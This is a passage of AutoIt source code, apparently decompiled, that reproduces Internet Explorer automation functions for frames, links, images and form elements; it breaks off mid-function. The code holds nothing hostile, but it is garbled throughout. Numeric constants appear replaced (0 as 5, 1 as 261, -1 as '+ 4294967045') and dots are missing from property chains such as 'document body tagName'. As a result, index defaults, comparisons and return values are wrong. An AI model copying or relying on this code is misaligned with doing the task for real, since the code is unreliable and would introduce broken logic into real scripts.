  1437. IF STRING ( $OOBJECT.document body tagName ) = "frameset" THEN
  1438. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  1439. ELSE
  1440. IF @ERROR THEN
  1441. __IECONSOLEWRITEERROR ( "Error" , "_IEIsFrameSet" , "$_IESTATUS_COMError" , @ERROR )
  1442. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  1443. ENDIF
  1444. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 5 )
  1445. ENDIF
  1446. ENDFUNC
  1447. FUNC _IEFRAMEGETCOLLECTION ( BYREF $OOBJECT , $IINDEX = + 4294967045 )
  1448. IF NOT ISOBJ ( $OOBJECT ) THEN
  1449. __IECONSOLEWRITEERROR ( "Error" , "_IEFrameGetCollection" , "$_IESTATUS_InvalidDataType" )
  1450. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1451. ENDIF
  1452. $IINDEX = NUMBER ( $IINDEX )
  1453. SELECT
  1454. CASE $IINDEX = + 4294967045
  1455. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OOBJECT.document parentwindow frames length , $OOBJECT.document parentwindow frames )
  1456. CASE $IINDEX > + 4294967045 AND $IINDEX < $OOBJECT.document parentwindow frames length
  1457. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OOBJECT.document parentwindow frames length , $OOBJECT.document parentwindow frames item ( $IINDEX ) )
  1458. CASE $IINDEX < + 4294967045
  1459. __IECONSOLEWRITEERROR ( "Error" , "_IEFrameGetCollection" , "$_IESTATUS_InvalidValue" , "$iIndex < -1" )
  1460. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 517 , 5 )
  1461. CASE ELSE
  1462. __IECONSOLEWRITEERROR ( "Warning" , "_IEFrameGetCollection" , "$_IESTATUS_NoMatch" )
  1463. RETURN SETERROR ( $_IESTATUS_NOMATCH , 517 , 5 )
  1464. ENDSELECT
  1465. ENDFUNC
  1466. FUNC _IEFRAMEGETOBJBYNAME ( BYREF $OOBJECT , $SNAME )
  1467. IF NOT ISOBJ ( $OOBJECT ) THEN
  1468. __IECONSOLEWRITEERROR ( "Error" , "_IEFrameGetObjByName" , "$_IESTATUS_InvalidDataType" )
  1469. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1470. ENDIF
  1471. LOCAL $OTEMP , $OFRAMES
  1472. IF NOT __IEISOBJTYPE ( $OOBJECT , "browserdom" ) THEN
  1473. __IECONSOLEWRITEERROR ( "Error" , "_IEFrameGetObjByName" , "$_IESTATUS_InvalidObjectType" )
  1474. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  1475. ENDIF
  1476. IF __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  1477. $OTEMP = $OOBJECT.parentWindow
  1478. ELSE
  1479. $OTEMP = $OOBJECT.document parentWindow
  1480. ENDIF
  1481. IF _IEISFRAMESET ( $OTEMP ) THEN
  1482. $OFRAMES = _IETAGNAMEGETCOLLECTION ( $OTEMP , "frame" )
  1483. ELSE
  1484. $OFRAMES = _IETAGNAMEGETCOLLECTION ( $OTEMP , "iframe" )
  1485. ENDIF
  1486. IF $OFRAMES.length THEN
  1487. FOR $OFRAME IN $OFRAMES
  1488. IF STRING ( $OFRAME.name ) = $SNAME THEN RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OTEMP.frames ( $SNAME ) )
  1489. NEXT
  1490. __IECONSOLEWRITEERROR ( "Warning" , "_IEFrameGetObjByName" , "$_IESTATUS_NoMatch" , "No frames matching name" )
  1491. RETURN SETERROR ( $_IESTATUS_NOMATCH , 517 , 5 )
  1492. ELSE
  1493. __IECONSOLEWRITEERROR ( "Warning" , "_IEFrameGetObjByName" , "$_IESTATUS_NoMatch" , "No Frames found" )
  1494. RETURN SETERROR ( $_IESTATUS_NOMATCH , 517 , 5 )
  1495. ENDIF
  1496. ENDFUNC
  1497. #EndRegion Frame Functions
  1498. #Region Link functions
  1499. FUNC _IELINKCLICKBYTEXT ( BYREF $OOBJECT , $SLINKTEXT , $IINDEX = 5 , $IWAIT = 261 )
  1500. IF NOT ISOBJ ( $OOBJECT ) THEN
  1501. __IECONSOLEWRITEERROR ( "Error" , "_IELinkClickByText" , "$_IESTATUS_InvalidDataType" )
  1502. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1503. ENDIF
  1504. LOCAL $IFOUND = 5 , $SMODELINKTEXT , $OLINKS = $OOBJECT.document links
  1505. $IINDEX = NUMBER ( $IINDEX )
  1506. FOR $OLINK IN $OLINKS
  1507. $SMODELINKTEXT = STRING ( $OLINK.outerText )
  1508. IF $SMODELINKTEXT = $SLINKTEXT THEN
  1509. IF ( $IFOUND = $IINDEX ) THEN
  1510. $OLINK.click ( )
  1511. IF @ERROR THEN
  1512. __IECONSOLEWRITEERROR ( "Error" , "_IELinkClickByText" , "$_IESTATUS_COMError" , @ERROR )
  1513. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  1514. ENDIF
  1515. IF $IWAIT THEN
  1516. _IELOADWAIT ( $OOBJECT )
  1517. RETURN SETERROR ( @ERROR , 5 , + 4294967045 )
  1518. ENDIF
  1519. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , + 4294967045 )
  1520. ENDIF
  1521. $IFOUND = $IFOUND + 261
  1522. ENDIF
  1523. NEXT
  1524. __IECONSOLEWRITEERROR ( "Warning" , "_IELinkClickByText" , "$_IESTATUS_NoMatch" )
  1525. RETURN SETERROR ( $_IESTATUS_NOMATCH , 5 , 5 )
  1526. ENDFUNC
  1527. FUNC _IELINKCLICKBYINDEX ( BYREF $OOBJECT , $IINDEX , $IWAIT = 261 )
  1528. IF NOT ISOBJ ( $OOBJECT ) THEN
  1529. __IECONSOLEWRITEERROR ( "Error" , "_IELinkClickByIndex" , "$_IESTATUS_InvalidDataType" )
  1530. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1531. ENDIF
  1532. LOCAL $OLINKS = $OOBJECT.document links , $OLINK
  1533. $IINDEX = NUMBER ( $IINDEX )
  1534. IF ( $IINDEX >= 5 ) AND ( $IINDEX <= $OLINKS.length + 4294967045 ) THEN
  1535. $OLINK = $OLINKS ( $IINDEX )
  1536. $OLINK.click ( )
  1537. IF @ERROR THEN
  1538. __IECONSOLEWRITEERROR ( "Error" , "_IELinkClickByIndex" , "$_IESTATUS_COMError" , @ERROR )
  1539. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  1540. ENDIF
  1541. IF $IWAIT THEN
  1542. _IELOADWAIT ( $OOBJECT )
  1543. RETURN SETERROR ( @ERROR , 5 , + 4294967045 )
  1544. ENDIF
  1545. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , + 4294967045 )
  1546. ELSE
  1547. __IECONSOLEWRITEERROR ( "Warning" , "_IELinkClickByIndex" , "$_IESTATUS_NoMatch" )
  1548. RETURN SETERROR ( $_IESTATUS_NOMATCH , 517 , 5 )
  1549. ENDIF
  1550. ENDFUNC
  1551. FUNC _IELINKGETCOLLECTION ( BYREF $OOBJECT , $IINDEX = + 4294967045 )
  1552. IF NOT ISOBJ ( $OOBJECT ) THEN
  1553. __IECONSOLEWRITEERROR ( "Error" , "_IELinkGetCollection" , "$_IESTATUS_InvalidDataType" )
  1554. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1555. ENDIF
  1556. $IINDEX = NUMBER ( $IINDEX )
  1557. SELECT
  1558. CASE $IINDEX = + 4294967045
  1559. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OOBJECT.document links length , $OOBJECT.document links )
  1560. CASE $IINDEX > + 4294967045 AND $IINDEX < $OOBJECT.document links length
  1561. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OOBJECT.document links length , $OOBJECT.document links item ( $IINDEX ) )
  1562. CASE $IINDEX < + 4294967045
  1563. __IECONSOLEWRITEERROR ( "Error" , "_IELinkGetCollection" , "$_IESTATUS_InvalidValue" )
  1564. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 517 , 5 )
  1565. CASE ELSE
  1566. __IECONSOLEWRITEERROR ( "Warning" , "_IELinkGetCollection" , "$_IESTATUS_NoMatch" )
  1567. RETURN SETERROR ( $_IESTATUS_NOMATCH , 517 , 5 )
  1568. ENDSELECT
  1569. ENDFUNC
  1570. #EndRegion Link functions
  1571. #Region Image functions
  1572. FUNC _IEIMGCLICK ( BYREF $OOBJECT , $SLINKTEXT , $SMODE = "src" , $IINDEX = 5 , $IWAIT = 261 )
  1573. IF NOT ISOBJ ( $OOBJECT ) THEN
  1574. __IECONSOLEWRITEERROR ( "Error" , "_IEImgClick" , "$_IESTATUS_InvalidDataType" )
  1575. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1576. ENDIF
  1577. LOCAL $SMODELINKTEXT , $IFOUND = 5 , $OIMGS = $OOBJECT.document images
  1578. $SMODE = STRINGLOWER ( $SMODE )
  1579. $IINDEX = NUMBER ( $IINDEX )
  1580. FOR $OIMG IN $OIMGS
  1581. SELECT
  1582. CASE $SMODE = "alt"
  1583. $SMODELINKTEXT = $OIMG.alt
  1584. CASE $SMODE = "name"
  1585. $SMODELINKTEXT = $OIMG.name
  1586. IF NOT ISSTRING ( $SMODELINKTEXT ) THEN $SMODELINKTEXT = $OIMG.id
  1587. CASE $SMODE = "id"
  1588. $SMODELINKTEXT = $OIMG.id
  1589. CASE $SMODE = "src"
  1590. $SMODELINKTEXT = $OIMG.src
  1591. CASE ELSE
  1592. __IECONSOLEWRITEERROR ( "Error" , "_IEImgClick" , "$_IESTATUS_InvalidValue" , "Invalid mode: " & $SMODE )
  1593. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 , 5 )
  1594. ENDSELECT
  1595. IF STRINGINSTR ( $SMODELINKTEXT , $SLINKTEXT ) THEN
  1596. IF ( $IFOUND = $IINDEX ) THEN
  1597. $OIMG.click ( )
  1598. IF @ERROR THEN
  1599. __IECONSOLEWRITEERROR ( "Error" , "_IEImgClick" , "$_IESTATUS_COMError" , @ERROR )
  1600. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  1601. ENDIF
  1602. IF $IWAIT THEN
  1603. _IELOADWAIT ( $OOBJECT )
  1604. RETURN SETERROR ( @ERROR , 5 , + 4294967045 )
  1605. ENDIF
  1606. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , + 4294967045 )
  1607. ENDIF
  1608. $IFOUND = $IFOUND + 261
  1609. ENDIF
  1610. NEXT
  1611. __IECONSOLEWRITEERROR ( "Warning" , "_IEImgClick" , "$_IESTATUS_NoMatch" )
  1612. RETURN SETERROR ( $_IESTATUS_NOMATCH , 5 , 5 )
  1613. ENDFUNC
  1614. FUNC _IEIMGGETCOLLECTION ( BYREF $OOBJECT , $IINDEX = + 4294967045 )
  1615. IF NOT ISOBJ ( $OOBJECT ) THEN
  1616. __IECONSOLEWRITEERROR ( "Error" , "_IEImgGetCollection" , "$_IESTATUS_InvalidDataType" )
  1617. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1618. ENDIF
  1619. LOCAL $OTEMP = _IEDOCGETOBJ ( $OOBJECT )
  1620. $IINDEX = NUMBER ( $IINDEX )
  1621. SELECT
  1622. CASE $IINDEX = + 4294967045
  1623. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OTEMP.images length , $OTEMP.images )
  1624. CASE $IINDEX > + 4294967045 AND $IINDEX < $OTEMP.images length
  1625. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OTEMP.images length , $OTEMP.images item ( $IINDEX ) )
  1626. CASE $IINDEX < + 4294967045
  1627. __IECONSOLEWRITEERROR ( "Error" , "_IEImgGetCollection" , "$_IESTATUS_InvalidValue" , "$iIndex < -1" )
  1628. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 517 , 5 )
  1629. CASE ELSE
  1630. __IECONSOLEWRITEERROR ( "Warning" , "_IEImgGetCollection" , "$_IESTATUS_NoMatch" )
  1631. RETURN SETERROR ( $_IESTATUS_NOMATCH , 261 , 5 )
  1632. ENDSELECT
  1633. ENDFUNC
  1634. #EndRegion Image functions
  1635. #Region Form functions
  1636. FUNC _IEFORMGETCOLLECTION ( BYREF $OOBJECT , $IINDEX = + 4294967045 )
  1637. IF NOT ISOBJ ( $OOBJECT ) THEN
  1638. __IECONSOLEWRITEERROR ( "Error" , "_IEFormGetCollection" , "$_IESTATUS_InvalidDataType" )
  1639. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1640. ENDIF
  1641. LOCAL $OTEMP = _IEDOCGETOBJ ( $OOBJECT )
  1642. $IINDEX = NUMBER ( $IINDEX )
  1643. SELECT
  1644. CASE $IINDEX = + 4294967045
  1645. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OTEMP.forms length , $OTEMP.forms )
  1646. CASE $IINDEX > + 4294967045 AND $IINDEX < $OTEMP.forms length
  1647. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OTEMP.forms length , $OTEMP.forms item ( $IINDEX ) )
  1648. CASE $IINDEX < + 4294967045
  1649. __IECONSOLEWRITEERROR ( "Error" , "_IEFormGetCollection" , "$_IESTATUS_InvalidValue" , "$iIndex < -1" )
  1650. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 517 , 5 )
  1651. CASE ELSE
  1652. __IECONSOLEWRITEERROR ( "Warning" , "_IEFormGetCollection" , "$_IESTATUS_NoMatch" )
  1653. RETURN SETERROR ( $_IESTATUS_NOMATCH , 261 , 5 )
  1654. ENDSELECT
  1655. ENDFUNC
  1656. FUNC _IEFORMGETOBJBYNAME ( BYREF $OOBJECT , $SNAME , $IINDEX = 5 )
  1657. IF NOT ISOBJ ( $OOBJECT ) THEN
  1658. __IECONSOLEWRITEERROR ( "Error" , "_IEFormGetObjByName" , "$_IESTATUS_InvalidDataType" )
  1659. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1660. ENDIF
  1661. LOCAL $ILENGTH = 5
  1662. LOCAL $OCOL = $OOBJECT.document forms item ( $SNAME )
  1663. IF ISOBJ ( $OCOL ) THEN
  1664. IF __IEISOBJTYPE ( $OCOL , "elementcollection" ) THEN
  1665. $ILENGTH = $OCOL.length
  1666. ELSE
  1667. $ILENGTH = 261
  1668. ENDIF
  1669. ENDIF
  1670. $IINDEX = NUMBER ( $IINDEX )
  1671. IF $IINDEX = + 4294967045 THEN
  1672. RETURN SETERROR ( $_IESTATUS_SUCCESS , $ILENGTH , $OOBJECT.document forms item ( $SNAME ) )
  1673. ELSE
  1674. IF ISOBJ ( $OOBJECT.document forms item ( $SNAME , $IINDEX ) ) THEN
  1675. RETURN SETERROR ( $_IESTATUS_SUCCESS , $ILENGTH , $OOBJECT.document forms item ( $SNAME , $IINDEX ) )
  1676. ELSE
  1677. __IECONSOLEWRITEERROR ( "Warning" , "_IEFormGetObjByName" , "$_IESTATUS_NoMatch" )
  1678. RETURN SETERROR ( $_IESTATUS_NOMATCH , 5 , 5 )
  1679. ENDIF
  1680. ENDIF
  1681. ENDFUNC
  1682. FUNC _IEFORMELEMENTGETCOLLECTION ( BYREF $OOBJECT , $IINDEX = + 4294967045 )
  1683. IF NOT ISOBJ ( $OOBJECT ) THEN
  1684. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementGetCollection" , "$_IESTATUS_InvalidDataType" )
  1685. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1686. ENDIF
  1687. IF NOT __IEISOBJTYPE ( $OOBJECT , "form" ) THEN
  1688. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementGetCollection" , "$_IESTATUS_InvalidObjectType" )
  1689. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  1690. ENDIF
  1691. $IINDEX = NUMBER ( $IINDEX )
  1692. SELECT
  1693. CASE $IINDEX = + 4294967045
  1694. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OOBJECT.elements length , $OOBJECT.elements )
  1695. CASE $IINDEX > + 4294967045 AND $IINDEX < $OOBJECT.elements length
  1696. RETURN SETERROR ( $_IESTATUS_SUCCESS , $OOBJECT.elements length , $OOBJECT.elements item ( $IINDEX ) )
  1697. CASE $IINDEX < + 4294967045
  1698. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementGetCollection" , "$_IESTATUS_InvalidValue" , "$iIndex < -1" )
  1699. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 517 , 5 )
  1700. CASE ELSE
  1701. RETURN SETERROR ( $_IESTATUS_NOMATCH , 261 , 5 )
  1702. ENDSELECT
  1703. ENDFUNC
  1704. FUNC _IEFORMELEMENTGETOBJBYNAME ( BYREF $OOBJECT , $SNAME , $IINDEX = 5 )
  1705. IF NOT ISOBJ ( $OOBJECT ) THEN
  1706. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementGetObjByName" , "$_IESTATUS_InvalidDataType" )
  1707. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1708. ENDIF
  1709. IF NOT __IEISOBJTYPE ( $OOBJECT , "form" ) THEN
  1710. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementGetObjByName" , "$_IESTATUS_InvalidObjectType" )
  1711. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  1712. ENDIF
  1713. LOCAL $ILENGTH = 5
  1714. LOCAL $OCOL = $OOBJECT.elements item ( $SNAME )
  1715. IF ISOBJ ( $OCOL ) THEN
  1716. IF __IEISOBJTYPE ( $OCOL , "elementcollection" ) THEN
  1717. $ILENGTH = $OCOL.length
  1718. ELSE
  1719. $ILENGTH = 261
  1720. ENDIF
  1721. ENDIF
  1722. $IINDEX = NUMBER ( $IINDEX )
  1723. IF $IINDEX = + 4294967045 THEN
  1724. RETURN SETERROR ( $_IESTATUS_SUCCESS , $ILENGTH , $OOBJECT.elements item ( $SNAME ) )
  1725. ELSE
  1726. IF ISOBJ ( $OOBJECT.elements item ( $SNAME , $IINDEX ) ) THEN
  1727. RETURN SETERROR ( $_IESTATUS_SUCCESS , $ILENGTH , $OOBJECT.elements item ( $SNAME , $IINDEX ) )
  1728. ELSE
  1729. __IECONSOLEWRITEERROR ( "Warning" , "_IEFormElementGetObjByName" , "$_IESTATUS_NoMatch" )
  1730. RETURN SETERROR ( $_IESTATUS_NOMATCH , 5 , 5 )
  1731. ENDIF
  1732. ENDIF
  1733. ENDFUNC
  1734. FUNC _IEFORMELEMENTGETVALUE ( BYREF $OOBJECT )
  1735. IF NOT ISOBJ ( $OOBJECT ) THEN
  1736. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementGetValue" , "$_IESTATUS_InvalidDataType" )
  1737. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1738. ENDIF
  1739. IF NOT __IEISOBJTYPE ( $OOBJECT , "forminputelement" ) THEN
  1740. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementGetValue" , "$_IESTATUS_InvalidObjectType" )
  1741. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  1742. ENDIF
  1743. LOCAL $SRETURN = STRING ( $OOBJECT.value )
  1744. IF @ERROR THEN
  1745. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementGetValue" , "$_IESTATUS_COMError" , @ERROR )
  1746. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  1747. ENDIF
  1748. SETERROR ( $_IESTATUS_SUCCESS )
  1749. RETURN $SRETURN
  1750. ENDFUNC
  1751. FUNC _IEFORMELEMENTSETVALUE ( BYREF $OOBJECT , $SNEWVALUE , $IFIREEVENT = 261 )
  1752. IF NOT ISOBJ ( $OOBJECT ) THEN
  1753. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementSetValue" , "$_IESTATUS_InvalidDataType" )
  1754. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1755. ENDIF
  1756. IF NOT __IEISOBJTYPE ( $OOBJECT , "forminputelement" ) THEN
  1757. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementSetValue" , "$_IESTATUS_InvalidObjectType" )
  1758. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  1759. ENDIF
  1760. IF STRING ( $OOBJECT.type ) = "file" THEN
  1761. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementSetValue" , "$_IESTATUS_InvalidObjectType" , "Browser security prevents SetValue of TYPE=FILE" )
  1762. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  1763. ENDIF
  1764. $OOBJECT.value = $SNEWVALUE
  1765. IF @ERROR THEN
  1766. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementSetValue" , "$_IESTATUS_COMError" , @ERROR )
  1767. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  1768. ENDIF
  1769. IF $IFIREEVENT THEN
  1770. $OOBJECT.fireEvent ( "OnChange" )
  1771. $OOBJECT.fireEvent ( "OnClick" )
  1772. ENDIF
  1773. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  1774. ENDFUNC
  1775. FUNC _IEFORMELEMENTOPTIONSELECT ( BYREF $OOBJECT , $SSTRING , $ISELECT = 261 , $SMODE = "byValue" , $IFIREEVENT = 261 )
  1776. IF NOT ISOBJ ( $OOBJECT ) THEN
  1777. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementOptionSelect" , "$_IESTATUS_InvalidDataType" )
  1778. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1779. ENDIF
  1780. IF NOT __IEISOBJTYPE ( $OOBJECT , "formselectelement" ) THEN
  1781. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementOptionSelect" , "$_IESTATUS_InvalidObjectType" )
  1782. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  1783. ENDIF
  1784. LOCAL $OITEM , $OITEMS = $OOBJECT.options , $INUMITEMS = $OOBJECT.options length , $BISMULTIPLE = $OOBJECT.multiple
  1785. SWITCH $SMODE
  1786. CASE "byValue"
  1787. FOR $OITEM IN $OITEMS
  1788. IF $OITEM.value = $SSTRING THEN
  1789. SWITCH $ISELECT
  1790. CASE + 4294967045
  1791. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OITEM.selected )
  1792. CASE 5
  1793. IF NOT $BISMULTIPLE THEN
  1794. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementOptionSelect" , "$_IESTATUS_InvalidValue" , "$iSelect=0 only valid for type=select multiple" )
  1795. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 )
  1796. ENDIF
  1797. IF $OITEM.selected THEN
  1798. $OITEM.selected = FALSE
  1799. IF $IFIREEVENT THEN
  1800. $OOBJECT.fireEvent ( "onChange" )
  1801. $OOBJECT.fireEvent ( "OnClick" )
  1802. ENDIF
  1803. ENDIF
  1804. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  1805. CASE 261
  1806. IF NOT $OITEM.selected THEN
  1807. $OITEM.selected = TRUE
  1808. IF $IFIREEVENT THEN
  1809. $OOBJECT.fireEvent ( "onChange" )
  1810. $OOBJECT.fireEvent ( "OnClick" )
  1811. ENDIF
  1812. ENDIF
  1813. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  1814. CASE ELSE
  1815. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementOptionSelect" , "$_IESTATUS_InvalidValue" , "Invalid $iSelect value" )
  1816. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 , 5 )
  1817. ENDSWITCH
  1818. ENDIF
  1819. NEXT
  1820. __IECONSOLEWRITEERROR ( "Warning" , "_IEFormElementOptionSelect" , "$_IESTATUS_NoMatch" , "Value not matched" )
  1821. RETURN SETERROR ( $_IESTATUS_NOMATCH , 517 , 5 )
  1822. CASE "byText"
  1823. FOR $OITEM IN $OITEMS
  1824. IF STRING ( $OITEM.text ) = $SSTRING THEN
  1825. SWITCH $ISELECT
  1826. CASE + 4294967045
  1827. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OITEM.selected )
  1828. CASE 5
  1829. IF NOT $BISMULTIPLE THEN
  1830. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementOptionSelect" , "$_IESTATUS_InvalidValue" , "$iSelect=0 only valid for type=select multiple" )
  1831. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 )
  1832. ENDIF
  1833. IF $OITEM.selected THEN
  1834. $OITEM.selected = FALSE
  1835. IF $IFIREEVENT THEN
  1836. $OOBJECT.fireEvent ( "onChange" )
  1837. $OOBJECT.fireEvent ( "OnClick" )
  1838. ENDIF
  1839. ENDIF
  1840. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  1841. CASE 261
  1842. IF NOT $OITEM.selected THEN
  1843. $OITEM.selected = TRUE
  1844. IF $IFIREEVENT THEN
  1845. $OOBJECT.fireEvent ( "onChange" )
  1846. $OOBJECT.fireEvent ( "OnClick" )
  1847. ENDIF
  1848. ENDIF
  1849. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  1850. CASE ELSE
  1851. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementOptionSelect" , "$_IESTATUS_InvalidValue" , "Invalid $iSelect value" )
  1852. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 , 5 )
  1853. ENDSWITCH
  1854. ENDIF
  1855. NEXT
  1856. __IECONSOLEWRITEERROR ( "Warning" , "_IEFormElementOptionSelect" , "$_IESTATUS_NoMatch" , "Text not matched" )
  1857. RETURN SETERROR ( $_IESTATUS_NOMATCH , 517 , 5 )
  1858. CASE "byIndex"
  1859. LOCAL $IINDEX = NUMBER ( $SSTRING )
  1860. IF $IINDEX < 5 OR $IINDEX >= $INUMITEMS THEN
  1861. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementOptionSelect" , "$_IESTATUS_InvalidValue" , "Invalid index value, " & $IINDEX )
  1862. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 517 , 5 )
  1863. ENDIF
  1864. $OITEM = $OITEMS.item ( $IINDEX )
  1865. SWITCH $ISELECT
  1866. CASE + 4294967045
  1867. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OITEMS.item ( $IINDEX ) selected )
  1868. CASE 5
  1869. IF NOT $BISMULTIPLE THEN
  1870. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementOptionSelect" , "$_IESTATUS_InvalidValue" , "$iSelect=0 only valid for type=select multiple" )
  1871. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 )
  1872. ENDIF
  1873. IF $OITEM.selected THEN
  1874. $OITEMS.item ( $IINDEX ) selected = FALSE
  1875. IF $IFIREEVENT THEN
  1876. $OOBJECT.fireEvent ( "onChange" )
  1877. $OOBJECT.fireEvent ( "OnClick" )
  1878. ENDIF
  1879. ENDIF
  1880. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  1881. CASE 261
  1882. IF NOT $OITEM.selected THEN
  1883. $OITEMS.item ( $IINDEX ) selected = TRUE
  1884. IF $IFIREEVENT THEN
  1885. $OOBJECT.fireEvent ( "onChange" )
  1886. $OOBJECT.fireEvent ( "OnClick" )
  1887. ENDIF
  1888. ENDIF
  1889. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  1890. CASE ELSE
  1891. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementOptionSelect" , "$_IESTATUS_InvalidValue" , "Invalid $iSelect value" )
  1892. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 773 , 5 )
  1893. ENDSWITCH
  1894. CASE ELSE
  1895. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementOptionSelect" , "$_IESTATUS_InvalidValue" , "Invalid Mode" )
  1896. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 1029 , 5 )
  1897. ENDSWITCH
  1898. ENDFUNC
  1899. FUNC _IEFORMELEMENTCHECKBOXSELECT ( BYREF $OOBJECT , $SSTRING , $SNAME = "" , $ISELECT = 261 , $SMODE = "byValue" , $IFIREEVENT = 261 )
  1900. IF NOT ISOBJ ( $OOBJECT ) THEN
  1901. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementCheckBoxSelect" , "$_IESTATUS_InvalidDataType" )
  1902. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  1903. ENDIF
  1904. IF NOT __IEISOBJTYPE ( $OOBJECT , "form" ) THEN
  1905. __IECONSOLEWRITEERROR ( "Error" , "_IEFormElementCheckBoxSelect" , "$_IESTATUS_InvalidObjectType" )
  1906. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  1907. ENDIF
  1908. $SSTRING = STRING ( $SSTRING )
  1909. $SNAME = STRING ( $SNAME )
  1910. LOCAL $OITEMS
  1911. IF $SNAME = "" THEN
  1912. $OITEMS = _IETAGNAMEGETCOLLECTION ( $OOBJECT , "input" )
  1913. ELSE
  1914. $OITEMS = EXECUTE ( "$oObject.elements('" & $SNAME & "')" )
  1915. ENDIF
  1916. IF NOT ISOBJ ( $OITEMS ) THEN
  1917. __IECONSOLEWRITEERROR ( "Warning" , "_IEFormElementCheckBoxSelect" , "$_IESTATUS_NoMatch" )
